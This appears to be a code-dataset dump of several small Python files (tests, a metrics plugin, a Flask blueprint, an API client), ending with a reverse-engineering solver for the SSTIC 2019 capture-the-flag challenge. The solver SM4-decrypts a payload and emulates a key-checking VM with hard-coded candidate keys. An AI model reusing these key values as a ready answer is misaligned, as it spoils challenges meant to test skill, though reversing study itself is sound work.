| 18.333333 | 32 | 0.654545 | 9 | 55 | 3.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 0.145455 | 55 | 2 | 33 | 27.5 | 0.617021 | 0.472727 | 0 | 0 | 0 | 0 | 0.217391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad185864b0257450aa7c1d7f4d336d5631a276f2 | 1,232 | py | Python | tests/test/search/test_references_searcher_db_files.py | watermelonwolverine/fvttmv | 8689d47d1f904dd2bf0a083de515fda65713c460 | [
"MIT"
] | 1 | 2022-03-30T19:12:14.000Z | 2022-03-30T19:12:14.000Z | tests/test/search/test_references_searcher_db_files.py | watermelonwolverine/fvttmv | 8689d47d1f904dd2bf0a083de515fda65713c460 | [
"MIT"
] | null | null | null | tests/test/search/test_references_searcher_db_files.py | watermelonwolverine/fvttmv | 8689d47d1f904dd2bf0a083de515fda65713c460 | [
"MIT"
] | null | null | null | from fvttmv.search.__references_searcher_db_files import ReferencesSearcherDbFiles
from test.common import TestCase, AbsPaths, References
class ReferencesSearcherDbFilesTest(TestCase):
def test_search_for_references_in_db_files1(self):
print("test_search_for_references_in_db_files1")
expected = []
result = ReferencesSearcherDbFiles.search_for_references_in_db_files(AbsPaths.Data,
[], # TODO test: additional targets
"does/not/exist")
self.assertEqual(result, expected)
def test_search_for_references_in_db_files2(self):
print("test_search_for_references_in_db_files2")
expected = [AbsPaths.contains_1_db,
AbsPaths.contains_1_and_2_db]
result = ReferencesSearcherDbFiles.search_for_references_in_db_files(AbsPaths.Data,
[], # TODO test: additional targets
References.file1_original)
self.assertEqual(expected, result)
| 42.482759 | 113 | 0.57224 | 107 | 1,232 | 6.158879 | 0.35514 | 0.081942 | 0.172989 | 0.191199 | 0.528073 | 0.528073 | 0.528073 | 0.400607 | 0.291351 | 0.291351 | 0 | 0.010376 | 0.374188 | 1,232 | 28 | 114 | 44 | 0.844358 | 0.04789 | 0 | 0.222222 | 0 | 0 | 0.078632 | 0.066667 | 0 | 0 | 0 | 0.035714 | 0.111111 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.277778 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad1c7e0f78e361f8b94e7d3cccfcbd1e73831978 | 459 | py | Python | graph_explorer/structured_metrics/plugins/vmstat.py | farheenkaifee/dashboard_3 | bc557a6190a99182ec7a1c96dfdd33208a8575cd | [
"Apache-2.0"
] | 284 | 2015-01-03T05:35:18.000Z | 2022-01-19T08:30:31.000Z | graph_explorer/structured_metrics/plugins/vmstat.py | farheenkaifee/dashboard_3 | bc557a6190a99182ec7a1c96dfdd33208a8575cd | [
"Apache-2.0"
] | 9 | 2015-01-20T16:41:01.000Z | 2017-02-03T08:02:39.000Z | graph_explorer/structured_metrics/plugins/vmstat.py | isabella232/graph-explorer | bc557a6190a99182ec7a1c96dfdd33208a8575cd | [
"Apache-2.0"
] | 35 | 2015-02-05T13:03:51.000Z | 2022-01-19T08:31:15.000Z | from . import Plugin
class VmstatPlugin(Plugin):
targets = [
{
'match': '^servers\.(?P<server>[^\.]+)\.vmstat\.(?P<type>.*)$',
'target_type': 'rate',
'tags': {'unit': 'Page'}
}
]
def sanitize(self, target):
target['tags']['type'] = target['tags']['type'].replace('pgpg', 'paging_')
target['tags']['type'] = target['tags']['type'].replace('pswp', 'swap_')
# vim: ts=4 et sw=4:
| 27 | 82 | 0.490196 | 48 | 459 | 4.625 | 0.625 | 0.18018 | 0.252252 | 0.18018 | 0.315315 | 0.315315 | 0.315315 | 0 | 0 | 0 | 0 | 0.005865 | 0.257081 | 459 | 16 | 83 | 28.6875 | 0.645161 | 0.039216 | 0 | 0 | 0 | 0 | 0.307517 | 0.116173 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad1e54977e7558a8f0c8a31c237e57a940caccfa | 184 | py | Python | app/auth/__init__.py | Muxi-Studio/ccnu-network-culture-festival | 3ff62b2a3052d1c0fcbc62df53f8985ea8bfd9d3 | [
"MIT"
] | 3 | 2016-12-01T07:38:17.000Z | 2016-12-17T14:37:24.000Z | examples/HelloAPI/app/auth/__init__.py | misakar/rest | 8bf7369aaa9da5cc4a300c625e4d7fea21f52681 | [
"MIT"
] | 7 | 2020-03-24T16:05:11.000Z | 2022-01-13T00:51:53.000Z | examples/HelloAPI/app/auth/__init__.py | misakar/rest | 8bf7369aaa9da5cc4a300c625e4d7fea21f52681 | [
"MIT"
] | 4 | 2015-12-11T03:20:27.000Z | 2016-02-03T04:47:52.000Z | # coding: utf-8
from flask import Blueprint
auth = Blueprint(
'auth',
__name__,
template_folder = 'templates',
static_folder = 'static'
)
from . import views, forms
| 14.153846 | 34 | 0.663043 | 21 | 184 | 5.52381 | 0.714286 | 0.224138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007092 | 0.233696 | 184 | 12 | 35 | 15.333333 | 0.815603 | 0.070652 | 0 | 0 | 0 | 0 | 0.112426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ad2e32d215791b8f6d838656d93aa2028c4b0dfd | 416 | py | Python | dentexchange/apps/location/tests/test_zip_code.py | hellhound/dentexchange | 58ae303e842404fc9e1860f294ec8044a332bef3 | [
"BSD-3-Clause"
] | 1 | 2017-11-09T23:09:51.000Z | 2017-11-09T23:09:51.000Z | dentexchange/apps/location/tests/test_zip_code.py | hellhound/dentexchange | 58ae303e842404fc9e1860f294ec8044a332bef3 | [
"BSD-3-Clause"
] | null | null | null | dentexchange/apps/location/tests/test_zip_code.py | hellhound/dentexchange | 58ae303e842404fc9e1860f294ec8044a332bef3 | [
"BSD-3-Clause"
] | 3 | 2015-08-11T16:58:47.000Z | 2021-01-04T08:23:51.000Z | # -*- coding:utf-8 -*-
import unittest
import mock
import decimal
from ..models import ZipCode
class ZipCodeTestCase(unittest.TestCase):
def test_unicode_should_return_code(self):
# setup
model = ZipCode()
code = '1.0'
model.code = decimal.Decimal(code)
# action
returned_value = unicode(model)
# assert
self.assertEqual(code, returned_value)
| 19.809524 | 46 | 0.637019 | 46 | 416 | 5.630435 | 0.630435 | 0.100386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009836 | 0.266827 | 416 | 20 | 47 | 20.8 | 0.839344 | 0.096154 | 0 | 0 | 0 | 0 | 0.008086 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
ad32a03d43ea33a557f3e2f1e814ed32989f10d1 | 1,280 | py | Python | app/services/bgm_tv/bgm_tv.py | renovate-tests/pol | dca9aa4ce34273575d69a140dc3bb1d2ac14ecbf | [
"MIT"
] | 5 | 2019-05-11T05:14:44.000Z | 2019-09-07T10:22:53.000Z | app/services/bgm_tv/bgm_tv.py | renovate-tests/pol | dca9aa4ce34273575d69a140dc3bb1d2ac14ecbf | [
"MIT"
] | 161 | 2019-09-09T07:30:25.000Z | 2022-03-14T19:52:43.000Z | app/services/bgm_tv/bgm_tv.py | renovate-tests/pol | dca9aa4ce34273575d69a140dc3bb1d2ac14ecbf | [
"MIT"
] | 3 | 2019-09-07T13:15:05.000Z | 2020-05-06T04:30:46.000Z | from typing import Optional
import requests
from app.core import config
from app.services.bgm_tv.model import UserInfo, SubjectWithEps
class BgmApi:
def __init__(self, mirror=False):
self.session = requests.Session()
if mirror:
self.host = "mirror.api.bgm.rin.cat"
self.session.headers["user-agent"] = config.REQUEST_SERVICE_USER_AGENT
else:
self.host = "api.bgm.tv"
self.session.headers["user-agent"] = config.REQUEST_USER_AGENT
def url(self, path):
return f"https://{self.host}{path}"
@staticmethod
def error_in_response(data: dict):
return "error" in data
def subject_eps(self, subject_id: int) -> Optional[SubjectWithEps]:
r = self.session.get(self.url(f"/subject/{subject_id}/ep")).json()
if self.error_in_response(r):
return None
return SubjectWithEps.parse_obj(r)
def get_user_info(self, user_id: str) -> Optional[UserInfo]:
r = self.session.get(self.url(f"/user/{user_id}")).json()
if self.error_in_response(r):
return None
return UserInfo.parse_obj(r)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.session.close()
| 29.767442 | 82 | 0.640625 | 171 | 1,280 | 4.584795 | 0.374269 | 0.084184 | 0.057398 | 0.056122 | 0.267857 | 0.267857 | 0.267857 | 0.107143 | 0.107143 | 0.107143 | 0 | 0 | 0.241406 | 1,280 | 42 | 83 | 30.47619 | 0.807415 | 0 | 0 | 0.125 | 0 | 0 | 0.094531 | 0.035938 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21875 | false | 0 | 0.125 | 0.09375 | 0.59375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
ad5c22c2a30ebb3dd262b8552db1d5d150acb5ab | 500 | py | Python | tests/test_invoke.py | avara1986/ardy | 1942413f12e117b991278cada69f478474b9b94b | [
"Apache-2.0"
] | 3 | 2017-07-07T06:39:36.000Z | 2017-11-29T23:09:37.000Z | tests/test_invoke.py | avara1986/ardy | 1942413f12e117b991278cada69f478474b9b94b | [
"Apache-2.0"
] | 3 | 2017-07-06T20:23:30.000Z | 2018-11-05T21:15:48.000Z | tests/test_invoke.py | avara1986/ardy | 1942413f12e117b991278cada69f478474b9b94b | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# python imports
from __future__ import unicode_literals, print_function, absolute_import
import os
import unittest
from ardy.core.invoke import Invoke
TESTS_PATH = os.path.dirname(os.path.abspath(__file__))
class InvokeTest(unittest.TestCase):
EXAMPLE_PROJECT = "myexamplelambdaproject"
def setUp(self):
pass
def test_init(self):
invoke = Invoke(path=TESTS_PATH)
invoke.run("LambdaExample1")
if __name__ == '__main__':
unittest.main()
| 19.230769 | 72 | 0.726 | 61 | 500 | 5.57377 | 0.655738 | 0.052941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.18 | 500 | 25 | 73 | 20 | 0.82439 | 0.054 | 0 | 0 | 0 | 0 | 0.093617 | 0.046809 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.071429 | 0.285714 | 0 | 0.571429 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
ad61efd89b487352162b06da16ad5ffe5da41461 | 20,737 | py | Python | Step4/04_reversing_bis.py | Aterwyn/SSTIC2019 | d7fcddd5b223663910ec35aa1d419f0bc636e701 | [
"MIT"
] | null | null | null | Step4/04_reversing_bis.py | Aterwyn/SSTIC2019 | d7fcddd5b223663910ec35aa1d419f0bc636e701 | [
"MIT"
] | null | null | null | Step4/04_reversing_bis.py | Aterwyn/SSTIC2019 | d7fcddd5b223663910ec35aa1d419f0bc636e701 | [
"MIT"
] | null | null | null | from SM4 import SM4
input_data = "a1a2a3a4a5a6a7a8a9aaabacadaeafa0b1b2b3b4b5b6b7b8b9babbbcbdbebfb0"
input_data = "acadaa8b5b55306fb3c6dfc3b2d1c80770084644225febd71a9189aa26ec740e"
#input_data = "0000000000000000000000000000000000000000000000000000000000000000"
global input_list
input_list = bytearray.fromhex(input_data)
global data
data = [0]*16
#plain data, written in little-endian
#const0 = bytearray.fromhex("08251587e988e8de")[::-1] + bytearray.fromhex("5fa89078ee10390f")[::-1]
#const1 = bytearray.fromhex("d73f7a649d78f7f4")[::-1] + bytearray.fromhex("f556dc27813a05a1")[::-1]
const0 = bytearray.fromhex("6766722e612e7270")[::-1] + bytearray.fromhex("2e76662e666e632e")[::-1]
const1 = bytearray.fromhex("6640727976706e73")[::-1] + bytearray.fromhex("7465622e70766766")[::-1]
const2 = input_list[:0x10]
const3 = input_list[0x10:]
global sm4_data
sm4_data = const0 + const1 + const2 + const3 + bytearray.fromhex("00000000")
#0 encrypted
def print_sm4_data():
global sm4_data
print("")
for i in range(4):
print("0x" + sm4_data[i*0x10:i*0x10+8][::-1].hex() + " 0x" + sm4_data[i*0x10+8:(i+1)*0x10][::-1].hex())
def print_data():
global data
print("")
for i in range(0,16,4):
print("%08x %08x %08x %08x" % (data[i], data[i+1], data[i+2], data[i+3]))
#0x100000: 08251587e988e8de 5fa89078ee10390f
#0x100010: d73f7a649d78f7f4 f556dc27813a05a1
#0x100020: a8a7a6a5a4a3a2a1 a0afaeadacabaaa9
#0x100030: b8b7b6b5b4b3b2b1 b0bfbebdbcbbbab9
print_sm4_data()
f = open("decrypted_file",'rb')
global read
read = f.read()
f.close()
payload_offset = 0x4dbd8
read = read[payload_offset: payload_offset+0x101010]
def get_value_from_adr(adr):
global sm4_data, read
if adr >= 0x100000:
offset = adr-0x100000
return int(sm4_data[offset:offset+4][::-1].hex(),16)
else:
sm4 = SM4()
base_adr = adr&0xFFFFF0
#debug
#mod_adr = base_adr+0x1000
mod_adr = base_adr
base_offset = adr&0xF
data = read[mod_adr:mod_adr+0x10]
data2 = read[mod_adr+0x10: mod_adr+0x20]
dec_data1 = sm4.decrypt(base_adr, data)
sm4 = SM4()
dec_data2 = sm4.decrypt(base_adr+0x10, data2)
dec_data = dec_data1 + dec_data2
return int(dec_data[base_offset:base_offset+4][::-1].hex(), 16)
def insert_value_at_adr(val_int, adr):
global sm4_data
assert 0x100000<=adr and adr <=0x100040
#0159: insert 0x22926dbf (data[0x00]) at adr 0x100020 (adr pointed by data[0x0d]) <<<<
val_hex = (val_int).to_bytes(4, byteorder="little")
off = adr-0x100000
#print("%08x" % val_int)
#print(val_hex.hex())
#print("before: " + sm4_data.hex())
sm4_data = sm4_data[:off] + val_hex + sm4_data[off+4:]
#print(sm4_data.hex())
#print("offset: " + str(off))
#print("after : " + sm4_data.hex())
def loop():
data[0x04] = 0x0010
data[0x04] = data[0x04] << 0x0010
data[0x04] += 0x0020 #data[0x04] = 0x100020 #input
data[0x0d] = 0x0010
data[0x0d] = data[0x0d] << 0x0010
data[0x0d] += 0x0020 #data[0x0d] = 0x100020 #input
data[0x0c] = 0x0004
#Z1Z2Z3Z4Z5Z6Z7Z8Z9ZAZBZCZDZEZFZ0
#Y1Y2Y3Y4Y5Y6Y7Y8Y9YAYBYCYDYEYFY0
while (data[0xc] != 0): #counter C on 4
data[0x00] = get_value_from_adr(data[0x04])
data[0x00] = data[0x00] << 0x0010 & 0xFFFFFFFF
data[0x00] = data[0x00] >> 0x0010 #data[0x00] = 0 0 Z2 Z1
data[0x00] = (data[0x00]>>8) + ((data[0x00] & 0xff)<<8) #data[0x00] = 0 0 Z1 Z2
data[0x04] += 0x0002 #data[0x04] = 0x100022
data[0x01] = get_value_from_adr(data[0x04])
data[0x01] = data[0x01] << 0x0010 & 0xFFFFFFFF
data[0x01] = data[0x01] >> 0x0010
data[0x01] = (data[0x01]>>8) + ((data[0x01] & 0xff)<<8) #data[0x01] = 0 0 Z3 Z4
data[0x04] += 0x0002 #data[0x04] = 0x100024
data[0x02] = get_value_from_adr(data[0x04])
data[0x02] = data[0x02] << 0x0010 & 0xFFFFFFFF
data[0x02] = data[0x02] >> 0x0010
data[0x02] = (data[0x02]>>8) + ((data[0x02] & 0xff)<<8) #data[0x02] = 0 0 Z5 Z6
data[0x04] += 0x0002 #data[0x04] = 0x100026
data[0x03] = get_value_from_adr(data[0x04])
data[0x03] = data[0x03] << 0x0010 & 0xFFFFFFFF
data[0x03] = data[0x03] >> 0x0010
data[0x03] = (data[0x03]>>8) + ((data[0x03] & 0xff)<<8) #data[0x03] = 0 0 Z7 Z8
data[0x0e] = 0x0020
data[0x07] = 0x0007 #data[0x07] = 7
"""
#first time
data[0x00] = 0 0 Z1 Z2
data[0x01] = 0 0 Z3 Z4
data[0x02] = 0 0 Z5 Z6
data[0x03] = 0 0 Z7 Z8
data[0x07] = 7
#second time
data[0x00] = 0 0 X4 X3 0 0 Y1 Y2
data[0x01] = 0 0 0 20 ^ 0 0 X4 X3 ^ 0 0 Z5 Z6 0 0 Y3 Y4
data[0x02] = 0 0 Z7 Z8 0 0 Y5 Y6
data[0x03] = 0 0 Z1 Z2 0 0 Y7 Y8
data[0x07] = 3
#third time
"""
print("%08x %08x %08x %08x" % (data[0], data[1], data[2], data[3]))
print("\n\n")
print("0")
#print_data()
#print_sm4_data()
security = 0
while(data[0x0e] != 0): #counter E on 32
data[0x0e] -= 1 #decrement data[0x0e]-=1 = 0x1f decrement data[0x0e]-=1 =0x1e
data[0x04] = data[0x01] #data[0x04] = 0 0 Z3 Z4 data[0x04] = 0 0 Y3 Y4
data[0x05] = data[0x04] #data[0x05] = 0 0 Z3 Z4 data[0x05] = 0 0 Y3 Y4
data[0x04] = data[0x04] >> 0x0008 #data[0x04] = 0 0 0 Z3 data[0x04] = 0 0 0 Y3
data[0x04] &= 0x00ff
data[0x05] &= 0x00ff #data[0x05] = 0 0 0 Z4 data[0x05] = 0 0 0 Y4
data[0x0b] = data[0x05]
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 Z4 0 data[0x0b] = 0 0 Y4 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 7 0 0 data[0x0a] = 0 3 0 0
data[0x0a] += data[0x0b]
data[0x0a] += data[0x04] #data[0x0a] = 0 7 Z4 Z3 data[0x0a] = 0 3 Y4 Y3
data[0x0a] += 0x1000 #data[0x0a] = 0 7 Z4 Z3 + 0x1000 data[0x0a] = 0 3 Y4 Y3
data[0x06] = get_value_from_adr(data[0x0a]) #data[0x06] = *(0 7 Z4 Z3 +0x1000 ) data[0x06] = *(0 3 Y4 Y3)
data[0x06] &= 0x00ff #data[0x06] &= 0xFF (1 byte) = X1 data[0x06] &= 0xFF
#print("")
#print("adr: %06x" % data[0x0a])
#print("data06: %02x" % data[0x06])
data[0x07] -= 1 #data[0x07] -= 1 = 6 data[0x07] -= 1 = 2
data[0x0b] = data[0x04] #data[0x0b] = 0 0 0 Z3 data[0x0b] = 0 0 0 Y3
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 Z3 0 data[0x0b] = 0 0 Y3 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 6 0 0 data[0x0a] = 0 2 0 0
data[0x0a] += data[0x0b] #data[0x0a] = 0 6 Z3 0 data[0x0a] = 0 2 Y3 0
data[0x0a] += data[0x06] #data[0x0a] = 0 6 Z3 X1 data[0x0a] = 0 2 Y3 X1
data[0x0a] += 0x1000 #data[0x0a] = 0 6 Z3 X1 +0x1000 data[0x0a] = 0 2 Y3 X1
data[0x05] = get_value_from_adr(data[0x0a]) #data[0x05] = *(0 6 Z3 X1 +0x1000) data[0x05] = *(0 2 Y3 X1)
data[0x05] &= 0x00ff #data[0x05] &= 0xFF (byte) = X2 data[0x05] &= 0xFF (byte) = X2
#print("")
#print("adr: %06x" % data[0x0a])
#print("data05: %02x" % data[0x05])
if data[0x07] == 0:
data[0x07] = 0xa
data[0x07] -= 1 #data[0x07] -= 1 = 5 data[0x07] -= 1 = 1
data[0x0b] = data[0x06] #data[0x0b] = X1 data[0x0b] = X1
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 X1 0 data[0x0b] = 0 0 X1 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 5 0 0 data[0x0a] = 0 1 0 0
data[0x0a] += data[0x0b] #data[0x0a] = 0 5 X1 0 data[0x0a] = 0 1 X1 0
data[0x0a] += data[0x05] #data[0x0a] = 0 5 X1 X2 data[0x0a] = 0 1 X1 X2
data[0x0a] += 0x1000 #data[0x0a] = 0 5 X1 X2 +0x10000 data[0x0a] = 0 1 X1 X2
data[0x04] = get_value_from_adr(data[0x0a]) #data[0x04] = *(0 5 X1 X2 + 0x1000) data[0x04] = *(0 1 X1 X2)
data[0x04] &= 0x00ff #data[0x04] &= 0xFF (byte) = X3 data[0x04] = X3
#print("")
#print("adr: %06x" % data[0x0a])
#print("data04: %02x" % data[0x04])
data[0x07] -= 1 #data[0x07] -= 1 = 4 data[0x07] -= 1 = 0
data[0x0b] = data[0x05] #data[0x0b] = X2 data[0x0b] = X2
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 X2 0 data[0x0b] = 0 0 X2 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 4 0 0 data[0x0a] = 0 0 0 0
data[0x0a] += data[0x0b] #data[0x0a] = 0 4 X2 0 data[0x0a] = 0 0 X2 0
data[0x0a] += data[0x04] #data[0x0a] = 0 4 X2 X3 data[0x0a] = 0 0 X2 X3
data[0x0a] += 0x1000 #data[0x0a] = 0 4 X2 X3 +0x1000 data[0x0a] = 0 0 X2 X3
data[0x06] = get_value_from_adr(data[0x0a]) #data[0x06] = *(0 4 X2 X3 +0x1000) data[0x06] = *(0 0 X2 X3)
data[0x06] &= 0x00ff #data[0x06] &= 0xFF (byte) = X4 data[0x06] &= 0xFF (byte) = X4
#print("")
#print("adr: %06x" % data[0x0a])
#print("data06: %02x" % data[0x06])
if data[0x07] == 0:
data[0x07] = 0xa # data[0x07] = 0xa
data[0x07] -= 1 #data[0x07] -= 1 = 3 data[0x07] -= 1 = 9 5th time: data[0x07] = 8
data[0x09] = data[0x06] #data[0x09] = X4 data[0x09] = X4
data[0x09] = data[0x09] << 0x0008 #data[0x09] = 0 0 X4 0 data[0x09] = 0 0 X4 0
data[0x09] += data[0x04] #data[0x09] = 0 0 X4 X3 data[0x09] = 0 0 X4 X3
data[0x08] = data[0x0e] #data[0x08] = 0 0 0 1f data[0x08] = 0 0 0 1e 0 0 0 1b
data[0x08] = data[0x08] >> 0x0003 #data[0x08] = 0 0 0 7 data[0x08] = 0 0 0 7 0 0 0 6
data[0x08] &= 0x0001 #data[0x08] = 0 0 0 1 data[0x08] = 0 0 0 1 0 0 0 0
#print("debug: " + str(data[0x08]))
#010b get adr[data[0x0e]/4 - 1], const[data[0x0e]/4 - 1]
#010b: insert 0x7465622e at adr 0x100010, offset 0x0c #4
#010b: insert 0x70766766 at adr 0x100010, offset 0x08 #4
#010b: insert 0x66407279 at adr 0x100010, offset 0x04 #4
#010b: insert 0x76706e73 at adr 0x100010, offset 0x00 #4
#010b: insert 0x2e76662e at adr 0x100000, offset 0x0c #4
#010b: insert 0x666e632e at adr 0x100000, offset 0x08 #4
#010b: insert 0x6766722e at adr 0x100000, offset 0x04 #4
#010b: insert 0x612e7270 at adr 0x100000, offset 0x00 #1
if data[0x08] == 0:
#print("even")
data[0x08] = data[0x03] # data[0x08] = 0 0 Y7 Y8
data[0x03] = data[0x0e] # data[0x03] = 0 0 0 1b
data[0x03] += 0x0001 # data[0x03] = 0 0 0 1c
data[0x03] ^= data[0x00] # data[0x03] = 0 0 Y1 1c^Y2
data[0x03] ^= data[0x01] # data[0x03] = 0 0 Y1^Y3 1c^Y2^Y4
data[0x00] = data[0x09] # data[0x00] = 0 0 X4 X3
data[0x01] = data[0x02] # data[0x01] = 0 0 Y5 Y6
data[0x02] = data[0x08] # data[0x02] = 0 0 Y7 Y8
else: #data[x08] == 1
data[0x08] = data[0x00] #data[0x08] = 0 0 Z1 Z2 data[0x08] = 0 0 Y1 Y2
data[0x00] = data[0x09] #data[0x00] = 0 0 X4 X3 data[0x00] = 0 0 X4 X3
data[0x01] = data[0x0e] #data[0x01] = 0 0 0 1f data[0x01] = 0 0 0 1e
data[0x01] += 0x0001 #data[0x01] = 0 0 0 20 data[0x01] = 0 0 0 1f
data[0x01] ^= data[0x00] #data[0x01] = 0 0 X4 20^X3 data[0x01] = 0 0 X4 1f^X3
data[0x01] ^= data[0x02] #data[0x01] = 0 0 X4^Z5 20^X3^Z6 data[0x01] = 0 0 X4^Y5 1f^X3^Y6
data[0x02] = data[0x03] #data[0x02] = 0 0 Z7 Z8 data[0x02] = 0 0 Y7 Y8
data[0x03] = data[0x08] #data[0x03] = 0 0 Z1 Z2 data[0x03] = 0 0 Y1 Y2
#print("\n\n")
#print(str(32-data[0xe]) + " " + str(data[0xe]))
#print_data()
#print("DEBUG %02x %02x" % (data[0xe], data[0x7]))
security += 1
#if security == 33:
# raise Exception
data[0x00] = (data[0x00]>>8) + ((data[0x00] & 0xff)<<8)
data[0x01] = (data[0x01]>>8) + ((data[0x01] & 0xff)<<8)
data[0x01] = data[0x01] << 0x0010 & 0xFFFFFFFF
data[0x00] += data[0x01]
insert_value_at_adr(data[0x00], data[0xd])
#print("\n\n")
#print_data()
#print_sm4_data()
#raise Exception
#0159: insert 0x22926dbf (data[0x00]) at adr 0x100020 (adr pointed by data[0x0d]) <<<<
#0159: insert 0x6ffeed4d (data[0x00]) at adr 0x100028 (adr pointed by data[0x0d])
#0159: insert 0x10874ea1 (data[0x00]) at adr 0x100030 (adr pointed by data[0x0d])
#0159: insert 0x60e53499 (data[0x00]) at adr 0x100038 (adr pointed by data[0x0d])
data[0x0d] += 0x0004 #0x100024
data[0x02] = (data[0x02]>>8) + ((data[0x02] & 0xff)<<8)
data[0x03] = (data[0x03]>>8) + ((data[0x03] & 0xff)<<8)
data[0x03] = data[0x03] << 0x0010
data[0x02] += data[0x03]
insert_value_at_adr(data[0x02], data[0xd])
#print("\n\n")
#print_data()
#print_sm4_data()
#raise Exception
#016b: insert 0x4a7caf04 (data[0x02]) at adr 0x100024 (adr pointed by data[0xd]) <<<<
#016b: insert 0xd5ea9bc1 (data[0x02]) at adr 0x10002c (adr pointed by data[0xd])
#016b: insert 0x2e8e57d8 (data[0x02]) at adr 0x100034 (adr pointed by data[0xd])
#016b: insert 0xdc0bfbf0 (data[0x02]) at adr 0x10003c (adr pointed by data[0xd])
data[0x0d] += 0x0004 #0x100028
data[0x04] = data[0x0d]
data[0x0c] -= 1
data[0x0c] = 0x0010
data[0x0c] = data[0x0c] << 0x0010 & 0xFFFFFFFF #initialize data[0x0c] to 0x100000
data[0x0b] = 0x0020
data[0x0d] -= 0x0020 #set data[0x0d] to 0x100020
data[0x04] = 0x0000 #default result is set to correct
while (data[0x0b] != 0): #comparison over 32 bytes
data[0x00] = get_value_from_adr(data[0x0d]) #0x100020
data[0x00] &= 0x00ff
data[0x01] = get_value_from_adr(data[0x0c]) #0x100000 #reference key
data[0x01] &= 0x00ff
data[0x00] = abs(data[0x00] - data[0x01])
#advance offset to 01a1 since data[0x00] is not null
#comparison byte per byte
if data[0x00] != 0:
data[0x04] = 0x0001 #wrong result
else:
data[0x04] = data[0x04]
data[0x0d] += 0x0001
data[0x0c] += 0x0001
data[0x0b] -= 1
data[0x0] = data[0x04]
#deactivate for now
#if data[0x0] == 0:
# print("WIN !")
#else:
# print("LOOSE !")
#print_data()
#print_sm4_data()
print("")
loop()
print_data()
